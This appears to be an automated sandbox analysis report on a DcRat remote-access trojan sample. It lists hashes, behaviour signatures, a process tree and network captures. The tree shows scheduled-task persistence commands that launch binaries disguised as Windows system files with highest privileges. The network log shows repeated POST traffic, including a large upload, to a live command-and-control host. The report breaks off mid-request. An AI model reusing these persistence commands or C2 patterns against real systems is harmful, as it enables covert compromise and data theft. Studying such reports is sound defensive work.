Analysis

  • max time kernel
    116s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    11-12-2024 08:09

General

  • Target

    4128341009cc3f617bf5612d7c933bc99c00eea63dfce6f24bbe0ba16f1bb1f0.exe

  • Size

    2.1MB

  • MD5

    0e0afa05a99d26d55a9df6876eee479f

  • SHA1

    652fe26e32763a493f04e61c5a5d36c628217ef8

  • SHA256

    4128341009cc3f617bf5612d7c933bc99c00eea63dfce6f24bbe0ba16f1bb1f0

  • SHA512

    bc2b23ed0307f7cd81514ff8bfe83316e1b27b6dbd69a08ca0d4618e6363dd3de5d91b1d4f38b059c73c487867c5980b7e7c49c920672589273a140728510cfc

  • SSDEEP

    24576:2TbBv5rUyXVpz/IPMofzXxgF5X1u1seTK44vmrUcSgjBYsRX8TGxj4fY3D5K7TqD:IBJp0PbsCk44v0y4BYgAGxrNKvdVTK

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\4128341009cc3f617bf5612d7c933bc99c00eea63dfce6f24bbe0ba16f1bb1f0.exe
    "C:\Users\Admin\AppData\Local\Temp\4128341009cc3f617bf5612d7c933bc99c00eea63dfce6f24bbe0ba16f1bb1f0.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ESD\UST9UxLQoHNIIFaYLHo0xhIRlgCNcLzoLb106m2nL.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4936
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ESD\bQzfgHSGdt2kLcLlkun74cHPltHDXr5Sp886hMeTP.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:956
        • C:\ESD\Winver.exe
          "C:\ESD/Winver.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1404
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QXQBc8FYJD.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3260
            • C:\Windows\system32\chcp.com
              chcp 65001
              6⤵
                PID:2752
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                6⤵
                  PID:4564
                • C:\ESD\Winver.exe
                  "C:\ESD\Winver.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4360
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\ESD\RuntimeBroker.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4300
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\ESD\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1408
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\ESD\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2224
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4908
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3512
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3952
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\ESD\dllhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:460
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ESD\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4796
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\ESD\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1456
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\ESD\conhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3760
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ESD\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2820
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\ESD\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4664
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2192
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4504
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3080
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 7 /tr "'C:\ESD\Winver.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4512
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4932
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 12 /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2936

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dns.google
      • flag-us
        DNS
        232.168.11.51.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        232.168.11.51.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.210.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.210.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        136.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        136.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        209.205.72.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        209.205.72.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        58.55.71.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        58.55.71.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        bobaprog.ru
        Winver.exe
        Remote address:
        8.8.8.8:53
        Request
        bobaprog.ru
        IN A
        Response
        bobaprog.ru
        IN A
        37.44.238.250
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 344
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:08 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 1352
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 380
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:08 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 1068
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1000
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:09 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 4
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:10 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:11 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:12 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:13 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:15 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:16 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:17 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:18 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:19 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:20 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:22 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:23 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:24 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:25 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:26 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:27 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:29 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:30 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:31 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:32 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:33 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:35 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:36 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:37 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 136920
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:40 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 4
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
